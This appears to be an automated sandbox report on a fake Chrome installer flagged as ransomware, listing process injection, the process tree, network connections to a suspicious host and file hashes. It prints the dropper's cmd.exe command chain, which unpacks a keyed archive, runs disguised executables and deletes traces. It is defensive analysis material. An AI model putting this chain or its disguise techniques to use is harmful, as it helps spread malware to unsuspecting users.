PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1388 wrote to memory of 596 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000058C" "00000000000004A0"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 57B2D0FC5CA489275E47D05FF3F585AA

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUM2RDhEMjEtQTQ2Qy00MTY3LTk0RDctQzNENDQ0MjBEQzQ5fSIgdXNlcmlkPSJ7MzI2QkIxMTYtRkM0Qi00RUE3LThEREYtODFGRTA0OTZFM0JBfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0E5RjQ0OERELUEwRUMtNERBNS04NUQ1LUQ1NTlCNkU0RjgzRX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iNi4xLjc2MDEuMCIgc3A9IlNlcnZpY2UgUGFjayAxIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zMTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7OUYwQzFGNDQtMUM1MC0zOTZBLTQ4M0EtMDhEQTQ4OTZGRjBCfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxNzAxIi8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{AC6D8D21-A46C-4167-94D7-C3D44420DC49}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp"

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp"

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401c1148,0x1401c1158,0x1401c1168

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401c1148,0x1401c1158,0x1401c1168

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUM2RDhEMjEtQTQ2Qy00MTY3LTk0RDctQzNENDQ0MjBEQzQ5fSIgdXNlcmlkPSJ7MzI2QkIxMTYtRkM0Qi00RUE3LThEREYtODFGRTA0OTZFM0JBfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezZDMzk3OEY1LUJBQTktNDU0Ri04MTJGLTlBMzUxOTY3M0VDM30iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iNi4xLjc2MDEuMCIgc3A9IlNlcnZpY2UgUGFjayAxIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTA5LjAuNTQxNC4xMjAiIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMTQiIGlpZD0iezlGMEMxRjQ0LTFDNTAtMzk2QS00ODNBLTA4REE0ODk2RkYwQn0iIGNvaG9ydD0iMToxZzh4OiIgY29ob3J0bmFtZT0iV2luZG93cyA3Ij48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL2VkZ2VkbC5tZS5ndnQxLmNvbS9lZGdlZGwvcmVsZWFzZTIvY2hyb21lL2N6YW8yaHJ2cGs1d2dxcmt6NGtrczVyNzM0XzEwOS4wLjU0MTQuMTIwLzEwOS4wLjU0MTQuMTIwX2Nocm9tZV9pbnN0YWxsZXIuZXhlIiBkb3dubG9hZGVkPSI5MzEyMjYwMCIgdG90YWw9IjkzMTIyNjAwIiBkb3dubG9hZF90aW1lX21zPSIyNDUyMyIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMzM1NCIgZG93bmxvYWRfdGltZV9tcz0iMjUyNDEiIGRvd25sb2FkZWQ9IjkzMTIyNjAwIiB0b3RhbD0iOTMxMjI2MDAiIGluc3RhbGxfdGltZV9tcz0iMjgxNTgiLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6dd6b58,0x7fef6dd6b68,0x7fef6dd6b78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1620 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2008 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2016 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3060 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2820 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3400 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3508 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3724 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3840 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3688 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3816 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3744 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3768 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4040 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4056 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3268 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.yydsnb1.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 accounts.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:80 redirector.gvt1.com tcp
US 8.8.8.8:53 r5---sn-aigl6nzk.gvt1.com udp
GB 74.125.175.106:80 r5---sn-aigl6nzk.gvt1.com tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 216.58.213.10:443 ogads-pa.googleapis.com tcp
N/A 224.0.0.251:5353 udp
GB 216.58.213.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp

Files

\Windows\Installer\MSIBC6C.tmp

MD5 c7fbd5ee98e32a77edf1156db3fca622
SHA1 3e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256 e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA512 8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

C:\Windows\Installer\MSIBD97.tmp

MD5 ae463676775a1dd0b7a28ddb265b4065
SHA1 dff64c17885c7628b22631a2cdc9da83e417d348
SHA256 83fbfcaff3da3eb89f9aec29e6574cf15502fd670cbb2ab0c8a84451b2598b22
SHA512 e47c2db249e7a08c5d2864671fbc235e48aebecbe0b2c2334d1a4cba1b5b3037522ff89408589f3559b3a1eaf507bd338645387d55800029bb3b941d4c7744d6

C:\Config.Msi\f76bc13.rbs

MD5 28fb83b3fd1e266a1ae70058bbc530a0
SHA1 c07d64269a927c057f0d6a63f5f83f5f6daaf984
SHA256 a99f78924e00d6fc234093f5ae38cdb58c274715d47f74898ee5ebd67351c06a
SHA512 00f30b2b1dff0509de0e31ff9b84c03e2bd046945615de514de4f6130b10c9d0a09ffbfe81a376b41884c702e4db6bb503b17dfbb15758224ea59409a7a4a780

\ProgramData\setup\aa.exe

MD5 09c448be7e7d84e6e544cc03afbb05d8
SHA1 ddc13e71a72bc49c60f89b98cbb79c2449cfa07e
SHA256 a0f127a70943b0262060498c1723c795a8e2980f1acf0c42ee8c1dae72ae54b5
SHA512 e5f7a988a999e7e34d0aa2d2a5b2fbb22689588d3def4bed4518ceed38710e3714c5614bab192b0ce6bcac5172a87ebf3b3b923e495eb7344c70bd11f4bf1c12

C:\ProgramData\setup\ddd

MD5 9bd359e3956d119811c3a6abef58e644
SHA1 9f221781f406ebcb15fc2c02d5d259116155c734
SHA256 ead38673817c84de77a4d2fe6118e6a96f863e3db38f73518007caa2af676146
SHA512 7f817794728e532da07424c621eeef161501644d137068895391505d7110f1f8ee9dc76944946e3960f84e462c66fd82ee61b619ca91a07166aed5d3434f618b

memory/1536-56-0x0000000000400000-0x0000000000510000-memory.dmp

\ProgramData\Packas\scrok.exe

MD5 a03b2eaa4d517fd935bb0032d444f22d
SHA1 014864aac638b7c04b4d50e6c39d7266eafda773
SHA256 6fd145b1de7d0a143fd25274544d5e3c4ecee06cf3e31631d51cae8ca3e25f01
SHA512 68a253fcdb3cd1a086fe93fa7c8a7500d6b5414bdfc0dad555973697d4fb552e09088b849573f705ca91b1652ddd4572842b82d40f5821761b3ac299e465be51

memory/1628-63-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1628-61-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1628-65-0x00000000779D0000-0x00000000779D2000-memory.dmp

